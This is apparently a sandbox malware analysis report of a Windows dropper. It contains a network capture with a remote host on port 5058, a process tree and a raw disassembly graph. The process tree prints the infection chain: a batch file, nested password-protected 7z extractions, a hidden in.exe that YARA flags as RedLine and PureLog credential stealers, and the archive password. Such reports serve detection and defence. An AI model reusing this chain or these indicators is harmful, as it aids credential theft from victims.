                                            Jul 26, 2024 19:26:04.389435053 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389487982 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.389565945 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389725924 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389758110 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389774084 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389791012 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389808893 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389825106 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389856100 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389887094 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389918089 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389945984 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389975071 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.389991045 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390028954 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390044928 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390060902 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390077114 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390093088 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390149117 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390177011 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390227079 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390273094 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390299082 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390316010 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390345097 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390361071 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390403032 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390433073 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390459061 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390475035 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390516996 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390533924 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390549898 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390584946 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390607119 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390623093 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390650988 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390677929 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390693903 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390712023 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390826941 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390842915 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390938044 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390959978 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.390999079 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.391014099 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.391031981 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.391539097 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.394412041 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.394458055 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.394474983 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.394490957 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.394506931 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.394524097 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.394597054 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.394809961 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.417340994 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.423288107 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.428145885 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.436161995 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436250925 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436319113 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436346054 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436372995 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436399937 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436444998 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436471939 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436546087 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436573029 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436600924 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436628103 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436654091 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436680079 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.436758995 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.464118958 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.469510078 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.958062887 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.968473911 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.974123955 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.091404915 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.095679998 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:05.100949049 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.215053082 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.217519999 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:05.223412991 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.336599112 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.386080980 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:05.420007944 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:05.426709890 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.540339947 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.550690889 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:05.556356907 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.669076920 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.710902929 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:05.716181040 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.830651045 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.870337009 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:05.878741026 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:05.885580063 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:05.998773098 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.053832054 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:06.203649998 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:06.209145069 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.323407888 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.325865984 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:06.331537008 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.444520950 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.446923971 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:06.452387094 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.565496922 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.616209984 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:06.624941111 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625004053 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625032902 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625061035 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625087976 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625140905 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625174046 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625200987 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625649929 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625719070 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625746012 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625772953 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625798941 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.625824928 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.739435911 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:06.792190075 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:07.338018894 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:07.343424082 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.456994057 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.460720062 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:07.465811014 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.582154036 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.587021112 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:07.592619896 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.705979109 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.706697941 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:07.711844921 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.824673891 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.825892925 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:07.831382990 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.945600986 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:07.970977068 CEST497065058192.168.2.523.94.183.150

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:13:25:50
                                            Start date:26/07/2024
                                            Path:C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe"
                                            Imagebase:0x400000
                                            File size:3'221'440 bytes
                                            MD5 hash:9795B9F24E9A98AE78F7CAD809ED1E2A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:2
                                            Start time:13:25:53
                                            Start date:26/07/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                            Imagebase:0x7ff624460000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:3
                                            Start time:13:25:53
                                            Start date:26/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:4
                                            Start time:13:25:53
                                            Start date:26/07/2024
                                            Path:C:\Windows\System32\mode.com
                                            Wow64 process (32bit):false
                                            Commandline:mode 65,10
                                            Imagebase:0x7ff6ed610000
                                            File size:33'280 bytes
                                            MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:5
                                            Start time:13:25:53
                                            Start date:26/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            Wow64 process (32bit):false
                                            Commandline:7z.exe e file.zip -p324051139125346723019431074 -oextracted
                                            Imagebase:0x450000
                                            File size:468'992 bytes
                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:6
                                            Start time:13:25:54
                                            Start date:26/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            Wow64 process (32bit):false
                                            Commandline:7z.exe e extracted/file_4.zip -oextracted
                                            Imagebase:0x450000
                                            File size:468'992 bytes
                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:7
                                            Start time:13:25:54
                                            Start date:26/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            Wow64 process (32bit):false
                                            Commandline:7z.exe e extracted/file_3.zip -oextracted
                                            Imagebase:0x450000
                                            File size:468'992 bytes
                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:8
                                            Start time:13:25:54
                                            Start date:26/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            Wow64 process (32bit):false
                                            Commandline:7z.exe e extracted/file_2.zip -oextracted
                                            Imagebase:0x450000
                                            File size:468'992 bytes
                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:9
                                            Start time:13:25:55
                                            Start date:26/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            Wow64 process (32bit):false
                                            Commandline:7z.exe e extracted/file_1.zip -oextracted
                                            Imagebase:0x450000
                                            File size:468'992 bytes
                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:10
                                            Start time:13:25:55
                                            Start date:26/07/2024
                                            Path:C:\Windows\System32\attrib.exe
                                            Wow64 process (32bit):false
                                            Commandline:attrib +H "in.exe"
                                            Imagebase:0x7ff656e40000
                                            File size:23'040 bytes
                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:11
                                            Start time:13:25:55
                                            Start date:26/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                            Wow64 process (32bit):true
                                            Commandline:"in.exe"
                                            Imagebase:0x420000
                                            File size:912'896 bytes
                                            MD5 hash:E8937B534F6C730C0A82793CCDDC0692
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:14.5%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:23.5%
                                              Total number of Nodes:1857
                                              Total number of Limit Nodes:20
                                              execution_graph 10344 412240 ??2@YAPAXI 10345 412251 10344->10345 10765 41945f __set_app_type __p__fmode __p__commode 10766 4194ce 10765->10766 10767 4194e2 10766->10767 10768 4194d6 __setusermatherr 10766->10768 10777 4195d6 _controlfp 10767->10777 10768->10767 10770 4194e7 _initterm __getmainargs _initterm 10771 41953b GetStartupInfoA 10770->10771 10773 41956f GetModuleHandleA 10771->10773 10778 4074d5 _EH_prolog 10773->10778 10777->10770 10781 405bfc ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 10778->10781 11184 402017 GetModuleHandleW CreateWindowExW 10781->11184 10784 4074b4 MessageBoxA 10786 4074cb exit _XcptFilter 10784->10786 10785 405c3a 10785->10784 10787 405c54 10785->10787 10788 4014eb 2 API calls 10787->10788 10789 405c8b 10788->10789 10790 4014eb 2 API calls 10789->10790 10791 405c96 10790->10791 11187 404794 10791->11187 10796 402ab8 2 API calls 10797 405cd2 10796->10797 11196 4030cc 10797->11196 10799 405cdb lstrlenW 11210 40574f 10799->11210 10804 40574f 9 API calls 10805 405d11 10804->10805 10806 40574f 9 API calls 10805->10806 10807 405d1c 10806->10807 11226 404d0b #17 10807->11226 10810 405d34 wsprintfW 10812 405d51 10810->10812 10811 4011b7 2 API calls 10811->10810 10813 40574f 9 API calls 10812->10813 10814 405d63 10813->10814 11252 4046e2 10814->11252 10817 4046e2 3 API calls 10819 405dbe 10817->10819 10818 405d7b _wtol 10820 405d91 10818->10820 10821 405dc4 10819->10821 10822 405df8 10819->10822 10820->10817 11464 4052de 10821->11464 10824 4046e2 3 API calls 10822->10824 10825 405e03 10824->10825 10826 405e14 10825->10826 10827 405e09 10825->10827 10830 4046e2 3 API calls 10826->10830 11486 4056f2 10827->11486 10836 405e23 10830->10836 10832 405ddc ??3@YAXPAX ??3@YAXPAX 10832->10786 10833 405e59 GetModuleFileNameW 10834 405e6b 10833->10834 10835 405e7d 10833->10835 10838 409606 57 API calls 10834->10838 10839 4046e2 3 API calls 10835->10839 10836->10833 10837 4011b7 2 API calls 10836->10837 10837->10833 11030 405dc9 ??3@YAXPAX 10838->11030 10850 405e9f 10839->10850 10840 406047 10841 40143c 2 API calls 10840->10841 10842 406057 10841->10842 10843 40143c 2 API calls 10842->10843 10847 406064 10843->10847 10844 405f9c 10846 4046e2 3 API calls 10844->10846 10845 405f69 10845->10844 10849 405f85 _wtol 10845->10849 10845->11030 10858 405ffb 10846->10858 10848 4060e9 10847->10848 10852 401403 2 API calls 10847->10852 10851 402696 3 API calls 10848->10851 10849->10844 10850->10840 10850->10844 10850->10845 10855 401795 2 API calls 10850->10855 10850->11030 10853 40610b 10851->10853 10854 406099 10852->10854 10856 401403 2 API calls 10853->10856 10857 401403 2 API calls 10854->10857 10855->10850 10859 406116 ??2@YAPAXI 10856->10859 10863 4060af 10857->10863 10858->10840 10860 404e9f 2 API calls 10858->10860 10861 406122 10859->10861 10862 40602c 10860->10862 11257 4123e3 10861->11257 10862->10840 10864 40143c 2 API calls 10862->10864 10865 40143c 2 API calls 10863->10865 10864->10840 10866 4060d9 10865->10866 10868 40247d 19 API calls 10866->10868 10870 4060e0 10868->10870 10873 402ab8 2 API calls 10870->10873 10871 406175 11260 402b19 10871->11260 10872 40614f 10874 409606 57 API calls 10872->10874 10873->10848 10874->11030 10878 40618a 10879 406190 10878->10879 10880 4061b4 10878->10880 10881 409606 57 API calls 10879->10881 10882 406246 10880->10882 10884 4046e2 3 API calls 10880->10884 10883 406198 ??3@YAXPAX 10881->10883 11294 4127e6 10882->11294 10883->11030 10887 4061cb 10884->10887 10887->10882 10895 4061d1 10887->10895 10888 406273 10890 40622a ??3@YAXPAX 10888->10890 10899 40627c 10888->10899 10890->11030 10892 406268 ??3@YAXPAX 10892->11030 10893 406288 wsprintfW 10896 40247d 19 API calls 10893->10896 10894 4062bb 11297 404f0e 10894->11297 10895->10890 11494 40599c 10895->11494 10896->10899 10899->10893 10899->10894 10903 40574f 9 API calls 10899->10903 10901 40574f 9 API calls 10956 4062da 10901->10956 10902 406200 10902->10890 10904 406206 10902->10904 10903->10899 10905 409606 57 API calls 10904->10905 10906 40620e ??3@YAXPAX 10905->10906 10906->11030 10907 406594 10908 4065f3 10907->10908 10909 402a67 2 API calls 10907->10909 10910 40574f 9 API calls 10908->10910 10911 4065b2 10909->10911 10913 406624 10910->10913 10914 404bfd 3 API calls 10911->10914 10912 404505 lstrlenW lstrlenW _wcsnicmp 10912->10956 10915 402a67 2 API calls 10913->10915 10916 4065c5 10914->10916 10917 40662f 10915->10917 10918 40143c 2 API calls 10916->10918 11362 404bfd 10917->11362 10921 4065d1 ??3@YAXPAX ??3@YAXPAX 10918->10921 10923 405976 4 API calls 10921->10923 10925 4065eb 10923->10925 10924 40143c 2 API calls 10926 406650 ??3@YAXPAX ??3@YAXPAX 10924->10926 10927 405950 4 API calls 10925->10927 11374 405976 10926->11374 10927->10908 10929 40666a 11379 405950 10929->11379 10931 406672 10932 40574f 9 API calls 10931->10932 10933 40667f 10932->10933 10934 404f0e 26 API calls 10933->10934 10935 406688 10934->10935 10936 4067f4 10935->10936 11577 402744 AllocateAndInitializeSid 10935->11577 11384 4029a6 10936->11384 10940 4066af 10942 4014eb 2 API calls 10940->10942 10941 40689f 11387 404952 10941->11387 10944 4066b7 10942->10944 10943 402a67 2 API calls 10986 40680b 10943->10986 10947 4014eb 2 API calls 10944->10947 10945 4064b5 _wtol 10945->10956 10949 4066bf GetCommandLineW 10947->10949 10952 404e9f 2 API calls 10949->10952 10950 406926 CoInitialize 10958 4029a6 lstrcmpW 10950->10958 10951 4014eb 2 API calls 10951->10956 10957 4066cf 10952->10957 10953 4068a1 ??3@YAXPAX 10953->10941 10955 4029a6 lstrcmpW 10959 4068d5 10955->10959 10956->10907 10956->10912 10956->10945 10956->10951 10960 404e9f 2 API calls 10956->10960 10987 4065f8 ??3@YAXPAX 10956->10987 11549 405195 10956->11549 11560 4049a9 10956->11560 11574 401503 10956->11574 10961 402a67 2 API calls 10957->10961 10962 40694c 10958->10962 10963 4068e5 10959->10963 10967 40247d 19 API calls 10959->10967 10960->10956 10964 4066da 10961->10964 10966 406960 10962->10966 10973 401403 2 API calls 10962->10973 11592 404495 10963->11592 10970 404cb1 2 API calls 10964->10970 10965 4014eb ??2@YAPAXI ??3@YAXPAX 10965->10986 10974 4044ae 16 API calls 10966->10974 10967->10963 10977 4066f8 10970->10977 10971 40143c 2 API calls 10971->10986 10973->10966 10978 406966 10974->10978 10980 404ccf 2 API calls 10977->10980 10983 4029a6 lstrcmpW 10978->10983 10979 40844b 22 API calls 10984 406908 10979->10984 10981 406705 10980->10981 10985 404ccf 2 API calls 10981->10985 10982 401403 2 API calls 10982->10986 10988 406976 10983->10988 11595 4081be ??3@YAXPAX 10984->11595 10990 406712 10985->10990 10986->10941 10986->10943 10986->10953 10986->10965 10986->10971 10986->10982 11585 4035cf ??2@YAPAXI 10986->11585 11591 402990 ??3@YAXPAX ??3@YAXPAX 10986->11591 10987->11030 10992 406a4f 10988->10992 10999 40698f lstrlenW 10988->10999 11580 404ced 10990->11580 10995 4029a6 lstrcmpW 10992->10995 10993 406913 ??3@YAXPAX 10993->10950 10996 406a60 10995->10996 11000 406a74 10996->11000 11001 406a67 _wtol 10996->11001 11017 4069a7 10999->11017 11004 406a96 11000->11004 11596 4097f6 11000->11596 11001->11000 11002 4017c0 2 API calls 11005 40672c 11002->11005 11003 40687c ??3@YAXPAX 11006 4029a6 lstrcmpW 11003->11006 11009 406aaa 11004->11009 11010 406a86 ??3@YAXPAX 11004->11010 11613 4096fb 11004->11613 11008 40143c 2 API calls 11005->11008 11006->10986 11011 406738 7 API calls 11008->11011 11052 406adb 11009->11052 11393 4015d8 11009->11393 11010->11004 11013 4053b2 9 API calls 11011->11013 11015 406780 11013->11015 11018 40678a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11015->11018 11019 4067be ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11015->11019 11023 401503 2 API calls 11017->11023 11018->11030 11019->11030 11020 406ac1 ??3@YAXPAX 11020->11030 11021 4014eb 2 API calls 11021->11052 11023->10992 11024 406c64 ??3@YAXPAX 11024->11030 11025 406b19 GetKeyState 11025->11052 11026 406cc6 11028 406cfc 11026->11028 11029 406cce 11026->11029 11027 4029a6 lstrcmpW 11027->11052 11033 4013d1 2 API calls 11028->11033 11667 4048a3 11029->11667 11481 4047e1 11030->11481 11031 401795 ??2@YAPAXI ??3@YAXPAX 11031->11052 11036 406d0a 11033->11036 11038 4044ae 16 API calls 11036->11038 11037 40143c 2 API calls 11039 406ceb ??3@YAXPAX 11037->11039 11040 406d13 11038->11040 11048 406d33 11039->11048 11041 406d24 ??3@YAXPAX 11040->11041 11045 40143c 2 API calls 11040->11045 11041->11048 11042 406cb6 ??3@YAXPAX ??3@YAXPAX 11042->11030 11043 406c59 ??3@YAXPAX 11043->11052 11044 406c83 11046 409606 57 API calls 11044->11046 11045->11041 11047 406c8f ??3@YAXPAX ??3@YAXPAX 11046->11047 11047->11030 11050 406d70 11048->11050 11051 406d7d 11048->11051 11049 401403 ??2@YAPAXI ??3@YAXPAX 11049->11052 11406 4019d2 ??2@YAPAXI 11050->11406 11680 408caa 11051->11680 11052->11021 11052->11024 11052->11025 11052->11026 11052->11027 11052->11031 11052->11042 11052->11043 11052->11044 11052->11049 11646 408bec 11052->11646 11659 408c6a 11052->11659 11055 406d79 11056 406dba 11055->11056 11057 406d8f 11055->11057 11058 404952 22 API calls 11056->11058 11688 40477e 11057->11688 11060 406dbf 11058->11060 11062 4073b0 11060->11062 11063 4014eb 2 API calls 11060->11063 11065 407428 11062->11065 11067 4029a6 lstrcmpW 11062->11067 11064 406ddd 11063->11064 11107 406df0 11064->11107 11692 404e49 11064->11692 11066 40746b ??3@YAXPAX ??3@YAXPAX 11065->11066 11072 4029a6 lstrcmpW 11065->11072 11070 407484 11066->11070 11071 40748a ??3@YAXPAX 11066->11071 11069 4073e1 11067->11069 11069->11065 11759 404765 11069->11759 11070->11071 11073 4047e1 4 API calls 11071->11073 11074 407447 11072->11074 11076 40749b ??3@YAXPAX ??3@YAXPAX 11073->11076 11074->11066 11078 407454 11074->11078 11075 4014eb ??2@YAPAXI ??3@YAXPAX 11075->11107 11076->10786 11081 4013d1 2 API calls 11078->11081 11079 406e1f 11082 407246 ??3@YAXPAX ??3@YAXPAX 11079->11082 11083 406e2c 11079->11083 11087 407463 11081->11087 11086 40734f 11082->11086 11088 404ccf 2 API calls 11083->11088 11084 4029a6 lstrcmpW 11084->11107 11085 40844b 22 API calls 11089 40741d 